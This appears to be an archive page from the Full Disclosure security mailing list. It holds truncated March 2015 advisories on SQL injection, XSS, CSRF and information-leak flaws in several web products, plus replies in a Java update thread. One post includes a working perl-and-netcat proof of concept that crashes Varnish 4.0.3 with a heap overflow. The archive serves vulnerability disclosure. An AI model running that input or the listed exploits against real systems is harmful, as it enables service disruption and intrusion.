Category Archives: Full Disclosure

Vastal I-tech phpVID 1.2.3 SQL Injection Security Vulnerabilities

Posted by Jing Wang on Mar 10

*Vastal I-tech phpVID 1.2.3 SQL Injection Security Vulnerabilities*

Exploit Title: Vastal I-tech phpVID /groups.php Multiple Parameters SQL
Injection Security Vulnerabilities
Product: phpVID
Vendor: Vastal I-tech
Vulnerable Versions: 1.2.3 0.9.9
Tested Version: 1.2.3 0.9.9
Advisory Publication: March 10, 2015
Latest Update: March 10, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command (‘SQL…

WordPress Daily Edition Theme v1.6.2 Information Leakage Security Vulnerabilities

Posted by Jing Wang on Mar 10

*WordPress Daily Edition Theme v1.6.2 Information Leakage Security
Vulnerabilities*

Exploit Title: WordPress Daily Edition Theme /thumb.php src Parameters
Information Leakage Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.* v1.5.* v1.4.* v1.3.* v1.2.* v1.1.*
v.1.0.*
Tested Version: v1.6.2
Advisory Publication: March 10, 2015
Latest Update: March 10, 2015
Vulnerability Type:…

WordPress Daily Edition Theme v1.6.2 XSS (Cross-site Scripting) Security Vulnerabilities

Posted by Jing Wang on Mar 10

*WordPress Daily Edition Theme v1.6.2 XSS (Cross-site Scripting) Security
Vulnerabilities*

Exploit Title: WordPress Daily Edition Theme /fiche-disque.php id
Parameters XSS Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.* v1.5.* v1.4.* v1.3.* v1.2.* v1.1.*
v.1.0.*
Tested Version: v1.6.2
Advisory Publication: March 10, 2015
Latest Update: March 10, 2015
Vulnerability Type:…

SuperWebMailer 5.50.0.01160 XSS (Cross-site Scripting) Security Vulnerabilities

Posted by Jing Wang on Mar 10

*SuperWebMailer 5.50.0.01160 XSS (Cross-site Scripting) Security
Vulnerabilities*

Exploit Title: SuperWebMailer /defaultnewsletter.php HTMLForm Parameter
XSS Security Vulnerabilities
Product: SuperWebMailer
Vendor: SuperWebMailer
Vulnerable Versions: 5.*.0.* 4.*.0.*
Tested Version: 5.*.0.* 4.*.0.*
Advisory Publication: March 10, 2015
Latest Update: March 10, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact…

Re: Java 8u40 released: why?

Posted by Dave Warren on Mar 10

Unfortunately for Apple and for Mac users in general, Mac users are
going to have to learn that the main security issue on Windows exists in
OSX too: The user. The only real thing that has kept OSX safe from
user-installed malware until now is the relative obscurity of OSX; as
OSX gains enough market share to be worth malware authors’ time, we’ll
see more and more malware, ranging from bundleware that replaces user
preference with…

Re: Java 8u40 released: why?

Posted by James Hodgkinson on Mar 10

Nick,

Nowhere in the quoted text or my comments did it say it was a forced option, only that it “appeared” in the update;
this thread started with questions as to whether there were any actual changes with the version bump, and I was offering
a possibility.

James

James Hodgkinson wrote:

Indeed!

So you did not notice the explanation that this would happen, right
there on the “continue the install” permission dialog?…

Varnish 4.0.3 heap-buffer-overflow while parsing backend server HTTP response.

Posted by Marek Kroemeke on Mar 10

Hi there,

Latest varnish-cache 4.0.3 (https://www.varnish-cache.org/) seems to have a problem with parsing HTTP responses from
backend.
The following example response will trigger a heap buffer overflow:

— cut —
perl -e 'print "HTTP/1.1 200 OK\r\nContent-Length: dupa" . "\n" x 15855 . "A" x 10000 . "\n" ' | nc -l 1098
— cut —

assuming your config uses localhost:1098 as backend.

meh…

[CVE Identifier Updated] OpenKM Platform Remote Reflected Cross Site Scripting

Posted by Mohamed A. Baset on Mar 10

# Exploit Title: OpenKM Platform Remote Reflected Cross Site Scripting
# Google Dork: N/A
# Date: 18-11-2014
# Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh)
# Vendor Homepage: http://www.openkm.com/en/
# Software Link: http://www.openkm.com/en/download-english.html
# Version: All…

MikroTik RouterOS Admin Password Change CSRF

Posted by Mohamed A. Baset on Mar 09

# Exploit Title: MikroTik RouterOS Admin Password Change CSRF
# Google Dork: N/A
# Date: 23-2-2015
# Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh)
# Vendor Homepage: http://www.mikrotik.com/
# Software Link: http://www.mikrotik.com/download
# Version: All versions < 5.0
# Tested on: All OS
# CVE…